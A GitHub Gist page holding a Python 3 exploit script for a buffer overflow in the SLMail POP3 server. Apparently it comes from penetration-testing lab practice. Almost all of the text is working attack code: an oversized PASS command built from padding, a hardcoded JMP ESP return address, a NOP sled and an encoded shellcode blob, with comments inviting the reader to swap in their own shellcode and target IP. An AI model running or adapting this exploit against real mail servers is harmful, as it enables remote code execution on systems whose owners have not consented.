Last active
October 3, 2018 18:00
-
-
Save digital-shokunin/2335eb9e56b220811e660be30179be04 to your computer and use it in GitHub Desktop.
SLMail overflow in python3
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
import socket | |
#Python 2 is dead/on borrowed time, write exploits in Python3 FTW | |
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
#Replace shellcode with your own but prepend b" to hex strings | |
shellcode = ( | |
b"\xda\xc3\xd9\x74\x24\xf4\x5f\x33\xc9\xbd\xc6\xe9\x1f\xf7\xb1" | |
b"\x52\x31\x6f\x17\x03\x6f\x17\x83\x29\x15\xfd\x02\x49\x0e\x80" | |
b"\xed\xb1\xcf\xe5\x64\x54\xfe\x25\x12\x1d\x51\x96\x50\x73\x5e" | |
b"\x5d\x34\x67\xd5\x13\x91\x88\x5e\x99\xc7\xa7\x5f\xb2\x34\xa6" | |
b"\xe3\xc9\x68\x08\xdd\x01\x7d\x49\x1a\x7f\x8c\x1b\xf3\x0b\x23" | |
b"\x8b\x70\x41\xf8\x20\xca\x47\x78\xd5\x9b\x66\xa9\x48\x97\x30" | |
b"\x69\x6b\x74\x49\x20\x73\x99\x74\xfa\x08\x69\x02\xfd\xd8\xa3" | |
b"\xeb\x52\x25\x0c\x1e\xaa\x62\xab\xc1\xd9\x9a\xcf\x7c\xda\x59" | |
b"\xad\x5a\x6f\x79\x15\x28\xd7\xa5\xa7\xfd\x8e\x2e\xab\x4a\xc4" | |
b"\x68\xa8\x4d\x09\x03\xd4\xc6\xac\xc3\x5c\x9c\x8a\xc7\x05\x46" | |
b"\xb2\x5e\xe0\x29\xcb\x80\x4b\x95\x69\xcb\x66\xc2\x03\x96\xee" | |
b"\x27\x2e\x28\xef\x2f\x39\x5b\xdd\xf0\x91\xf3\x6d\x78\x3c\x04" | |
b"\x91\x53\xf8\x9a\x6c\x5c\xf9\xb3\xaa\x08\xa9\xab\x1b\x31\x22" | |
b"\x2b\xa3\xe4\xe5\x7b\x0b\x57\x46\x2b\xeb\x07\x2e\x21\xe4\x78" | |
b"\x4e\x4a\x2e\x11\xe5\xb1\xb9\x14\xf1\xb9\x7a\x41\x07\xb9\x7d" | |
b"\x2a\x8e\x5f\x17\x5c\xc7\xc8\x80\xc5\x42\x82\x31\x09\x59\xef" | |
b"\x72\x81\x6e\x10\x3c\x62\x1a\x02\xa9\x82\x51\x78\x7c\x9c\x4f" | |
b"\x14\xe2\x0f\x14\xe4\x6d\x2c\x83\xb3\x3a\x82\xda\x51\xd7\xbd" | |
b"\x74\x47\x2a\x5b\xbe\xc3\xf1\x98\x41\xca\x74\xa4\x65\xdc\x40" | |
b"\x25\x22\x88\x1c\x70\xfc\x66\xdb\x2a\x4e\xd0\xb5\x81\x18\xb4" | |
b"\x40\xea\x9a\xc2\x4c\x27\x6d\x2a\xfc\x9e\x28\x55\x31\x77\xbd" | |
b"\x2e\x2f\xe7\x42\xe5\xeb\x17\x09\xa7\x5a\xb0\xd4\x32\xdf\xdd" | |
b"\xe6\xe9\x1c\xd8\x64\x1b\xdd\x1f\x74\x6e\xd8\x64\x32\x83\x90" | |
b"\xf5\xd7\xa3\x07\xf5\xfd" ) | |
# 5F4A358F FFE4 JMP ESP | |
jmpespaddr = b'\x8f\x35\x4a\x5f' | |
prepad = bytes(("A" * 2606).encode()) | |
nopsled = b'\x90' * 16 #accidentally sent \x60, because typo, and it still worked, weirdly enough. | |
padding = bytes(("C" * (3500 - 2606 - 4 - 16 - 351)).encode()) | |
buffer = prepad + jmpespaddr + nopsled + shellcode + padding | |
try: | |
print("\nSending not very nice buffer...") | |
connect=s.connect(('10.10.10.10',110)) #Replace IP with pop3 server IP | |
s.recv(1024) | |
s.send(b'USER operator\r\n') | |
s.recv(1024) | |
s.send(b'PASS ' + buffer + b'\r\n') | |
print("\nDone!") | |
s.close() | |
except Exception as e: | |
print("Could not connect to POP3") | |
print(e) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment